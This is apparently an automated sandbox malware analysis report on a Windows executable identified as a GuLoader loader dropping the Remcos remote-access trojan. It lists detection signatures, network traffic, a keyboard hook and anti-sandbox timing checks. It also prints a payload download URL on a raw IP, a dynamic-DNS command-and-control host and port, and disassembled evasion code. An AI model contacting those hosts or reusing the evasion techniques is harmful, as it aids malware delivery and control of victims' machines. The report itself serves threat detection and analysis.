Play interactive tour

Edit tour

Windows Analysis Report LzbZ4T1iV8.exe

Overview

General Information

Sample Name:	LzbZ4T1iV8.exe
Analysis ID:	458125
MD5:	41e1bc9de5f3b61639fb88143e933ff8
SHA1:	432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256:	d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LzbZ4T1iV8.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\LzbZ4T1iV8.exe' MD5: 41E1BC9DE5F3B61639FB88143E933FF8)

LzbZ4T1iV8.exe (PID: 1504 cmdline: 'C:\Users\user\Desktop\LzbZ4T1iV8.exe' MD5: 41E1BC9DE5F3B61639FB88143E933FF8)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}

Multi AV Scanner detection for submitted file

Show sources

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%			Perma Link
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: LzbZ4T1iV8.exe

Joe Sandbox ML: detected

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin^

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 194.5.97.128:39200

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\LzbZ4T1iV8.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F588C NtAllocateVirtualMemory,	1_2_020F588C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,	1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8FC4 NtProtectVirtualMemory,	1_2_020F8FC4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC NtResumeThread,	1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19 NtWriteVirtualMemory,	1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4 NtWriteVirtualMemory,	1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4 NtWriteVirtualMemory,	1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F58FA NtAllocateVirtualMemory,	1_2_020F58FA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F NtWriteVirtualMemory,	1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8 NtWriteVirtualMemory,	1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5 NtWriteVirtualMemory,	1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB NtResumeThread,	1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B42 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569B42
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569C0E LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569C0E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B3D TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569B3D

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404478	1_2_00404478
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404418	1_2_00404418
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404834	1_2_00404834
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004036F0	1_2_004036F0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004034F4	1_2_004034F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00403488	1_2_00403488
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004046B4	1_2_004046B4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404774	1_2_00404774
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404534	1_2_00404534
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004045F4	1_2_004045F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004035B2	1_2_004035B2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004043B8	1_2_004043B8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680	1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0567	1_2_020F0567
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA	1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF	1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC	1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19	1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F424C	1_2_020F424C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8A4B	1_2_020F8A4B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3C48	1_2_020F3C48
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E55	1_2_020F0E55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8C67	1_2_020F8C67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F9E67	1_2_020F9E67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1060	1_2_020F1060
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E7A	1_2_020F0E7A
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1070	1_2_020F1070
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0C8E	1_2_020F0C8E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F808E	1_2_020F808E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F249F	1_2_020F249F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2899	1_2_020F2899
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4	1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F56A3	1_2_020F56A3
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2EA2	1_2_020F2EA2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F14C6	1_2_020F14C6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4	1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20C0	1_2_020F20C0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7AD9	1_2_020F7AD9
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F10EB	1_2_020F10EB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EE6	1_2_020F7EE6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20FE	1_2_020F20FE
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2	1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3912	1_2_020F3912
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D10	1_2_020F5D10
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7F34	1_2_020F7F34
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F	1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F154C	1_2_020F154C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D5D	1_2_020F5D5D
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0B55	1_2_020F0B55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D68	1_2_020F1D68
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D73	1_2_020F1D73
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8	1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3FBC	1_2_020F3FBC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5	1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8	1_2_020F37D8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BD2	1_2_020F0BD2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F77FF	1_2_020F77FF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F89FD	1_2_020F89FD
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB	1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F87FA	1_2_020F87FA

Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: LzbZ4T1iV8.exe, 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1721652241.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000000.861623499.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7C81C95CE370506E.TMP

Jump to behavior

Source: LzbZ4T1iV8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004018D2 push fs; retf	1_2_004018D4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F662F push cs; iretd	1_2_020F6630
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F003D push esp; iretd	1_2_020F003E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F00AA push esp; iretd	1_2_020F00AB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_0056A006 pushfd ; iretd	13_2_0056A007
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569F30 pushfd ; retf	13_2_00569F43

Source: initial sample

Static PE information: section name: .text entropy: 7.08169017725

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,		1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,		1_2_020F0BEF

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://101.99.94.119/WEALTH_PRUUQVZW139.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F74C3 second address: 00000000020F7542 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push D90E6CFBh 0x00000010 call 00007F7AFC9FAF32h 0x00000015 mov dword ptr [ebp+04h], eax 0x00000018 mov ebx, dword ptr [eax+3Ch] 0x0000001b add eax, ebx 0x0000001d mov ebx, dword ptr [eax+78h] 0x00000020 mov eax, dword ptr [ebp+04h] 0x00000023 add eax, ebx 0x00000025 mov ecx, dword ptr [eax+18h] 0x00000028 mov dword ptr [ebp+08h], ecx 0x0000002b mov ecx, dword ptr [eax+1Ch] 0x0000002e mov dword ptr [ebp+14h], ecx 0x00000031 mov ecx, dword ptr [eax+24h] 0x00000034 mov dword ptr [ebp+10h], ecx 0x00000037 mov esi, dword ptr [eax+20h] 0x0000003a add esi, dword ptr [ebp+04h] 0x0000003d xor ecx, ecx 0x0000003f mov edx, dword ptr [esi] 0x00000041 add edx, dword ptr [ebp+04h] 0x00000044 mov dword ptr [ebp+000001F3h], eax 0x0000004a test si, 2E1Ah 0x0000004f mov eax, ecx 0x00000051 push eax 0x00000052 mov eax, dword ptr [ebp+000001F3h] 0x00000058 mov dword ptr [ebp+000001C8h], ebx 0x0000005e mov ebx, esi 0x00000060 push ebx 0x00000061 pushad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F734C second address: 00000000020F734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC9FAEFEh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F8236 second address: 00000000020F8261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC461375h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7D0C second address: 00000000020F7D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC9FAF1Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC9FAFF9h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC9FAEFAh 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC9FAF5Ch 0x00000062 call 00007F7AFC9FAF3Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC9FAFF9h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
